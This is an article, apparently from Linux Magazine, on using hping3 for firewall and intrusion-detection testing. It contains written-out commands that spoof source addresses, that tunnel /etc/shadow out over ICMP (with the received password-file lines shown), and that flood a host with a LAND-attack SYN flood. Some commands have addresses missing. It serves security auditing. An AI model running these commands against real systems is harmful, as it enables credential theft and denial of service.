Security testing with hping

Perimeter Testing

Perimeter testing means determining exactly what your firewall blocks and what it allows. To conduct a good test, you can spoof source IP addresses and source ports:

sudo hping3-a -S james -c 2 -p 80

The result of the above command is that packets will appear to originate from the system at Such a packet is useful for determining whether the firewall is allowing random packets in or out of your network.

In these cases, you don't have to use TCP. Using hping, you can generate UDP packets as well:

sudo hping3 targethost -c 2 --udp --baseport 80 --destport 80

The preceding command sends two UDP packets to port 80 on the target system from port 80 of your own system.

Of course, you can spoof the source IP address as well as the originating and destination ports:

sudo hping3 localhost -a -c 2 --udp --baseport 80 --destport 80

Penetration Testing

It's not enough to just know about how to use hping3; you need to also understand the basics of a penetration test. A typical test includes the following basic steps:

  • Network resource identification: This step is sometimes called network mapping, network footprinting, or target identification. The step involves scanning systems for open ports, fingerprinting operating systems, and determining the types of applications that are operating on open ports.
  • Scanning for vulnerabilities: Looking for vulnerabilities on server, firewall, and VoIP operating systems. You also conduct tests designed to break the existing authentication scheme. Once you are finished cracking systems, you then prioritize resources you have identified. For example, a system may have a fairly serious vulnerability that might not be very important. You might need to actually assign this system a lower priority than others that are considered more vital, especially if the vulnerable system isn't likely to become a stage for an attack. Many times, this step is considered part of the network resource identification, but I like to treat this activity as something separate. Determining vulnerabilities is a complex task that requires quite a bit of analytical thought.
  • Perimeter testing: A classic activity for hping3. For example, you can use hping3 to generate traffic that tests whether the firewall is capable of blocking spoofed internal packets.
  • Intrusion detection testing: In this step, you generate traffic to see if the intrusion detection system is capable of identifying anomalies and problems. Applications such as hping3 are perfect for generating such anomalous traffic.
  • Consideration of security policy and end user issues: In this step, you determine the effectiveness of the security policy, and how well the network's applications ensure compliance. You also determine how well end users comply with the security policy. Although this last step isn't really relevant to applications such as hping3, it's important to understand that an auditor does more than scan systems and generate packets.

Sending Files

Creating a tunnel is one way to find out what your firewall is capable of blocking. On your receiving system, issue the following command:

host$ sudo hping3 -i eth0 --listen signature --icmp

To send the contents of the file on your local system to a remote system named james, issue the following command:

user@host:~$ sudo hping3 -I eth0 localhost --icmp -d 100 --sign signature --file /etc/shadow

On your receiving system's terminal, you will see the output of the file you're sending (see Listing 4).

Listing 4

Sending a File

01 Warning: Unable to guess the output interface
02 hping3 listen mode
03 [main] memlockall(): Success
04 Warning: can't disable memory paging!
05 99999:7:::
06 proxy:*:14181:0:99999:7:::
07 www-data:*:14181:0:99999:7:::
08 backup:*:14181:0:99999:99999:7:::
09 proxy:*:14181:0:99999:7:::
10 www-data:*:14181:0:99999:7:::
11 backup:*:14181:0:99999:7:::
12 list:*:14181:0:99999:7:::
13 irc:*:14181:0:99999:7:::
14 gnats:*:14181:0:99999:7:::
15 nobody:*7:::
16 nobody:*^C
17 [code snipped due to hitting Ctrl + C to end the transmission]
18 ---  hping statistic ---
19 0 packets transmitted, 0 packets received, 0% packet loss
20 round-trip min/avg/max = 0.0/0.0/0.0 ms

Notice that the contents of the file has been sent through the firewall. Also notice that I've decided to send the contents of a particularly sensitive file. Creating an ad-hoc tunnel in this way allows quick file transfer back and forth across a firewall. Furthermore, this feature is useful for testing exactly what a firewall is capable of blocking.

Choosing an Audit Type

At the risk of oversimplifying, two types of audits exist: blind and non-blind. A blind audit is one in which you adopt the perspective of a hacker who doesn't know about the network and has to discover all of the systems. With non-blind audit, you don't need to worry about discovering the systems; instead, you focus on scanning the systems for vulnerabilities. Regardless of the approach you take to auditing, your goal is to discover resources, show how to penetrate the defenses, and demonstrate how an attack could spread to other systems.

Simulating Attacks

The LAND attack [4], which first appeared in 1997, involves sending a spoofed packet with its SYN flag activated to a target host. This spoofed packet has the same source IP and source port as the target hosts's IP. When the attack first appeared, it caused unpatched Windows systems (and some Linux systems) to create an infinite connection loop and crash.

Many attackers exploited this bug to wage simple, sophomoric, and highly annoying denial of service attacks. More sophisticated users realized that such attacks were useful for hijacking attacks.

A new variation of the LAND attack turned up in 2005, and this classic technique could easily appear again.

Hping3 can help you ensure that your systems are immune to such an attack. Suppose you want to test a system with the IP address of that has port 139 open. To do so, you would issue the following command:

sudo hping3 -S -a -k -s 139 -p 139 --flood

This attack could cause an unpatched target system to freeze. Also notice the --flood option, which sends thousands of packets to the system.

Buy this article as PDF

Express-Checkout as PDF
Price $2.95
(incl. VAT)

Buy Linux Magazine

Get it on Google Play

US / Canada

Get it on Google Play

UK / Australia

Related content

  • Security Strategies

    Is your data safe? Are your borders protected? This month we examine some expert techniques for building more secure networks.

  • Tool Tips

    We review htop 2.0.1, Metastore 1.1.0, fgallery 1.8.1, UniversalCodeGrep 0.2.1, hping 3.0.0, and NitroShare 0.3.1. 

  • KTools: KMyFirewall

    Linux has a fantastic selection of firewalls for securing stand-alone computers or whole networks. Although you can use IPTables to set up a firewall, the configuration is often the most difficult step. KMyFirewall offers a powerful, user-friendly, GUI-based approach.

  • Wifislax

    Modern WiFi installations provide comfort, but they often have serious security problems. Wifislax offers an extensive collection of tools for checking the security of your wireless network.

  • Wifislax 4.6

    Almost every wireless LAN has some potential security weaknesses. The Wifislax Slackware derivative helps detect and eliminate them.

comments powered by Disqus

Direct Download

Read full article as PDF:

038-041_hping.pdf  (443.94 kB)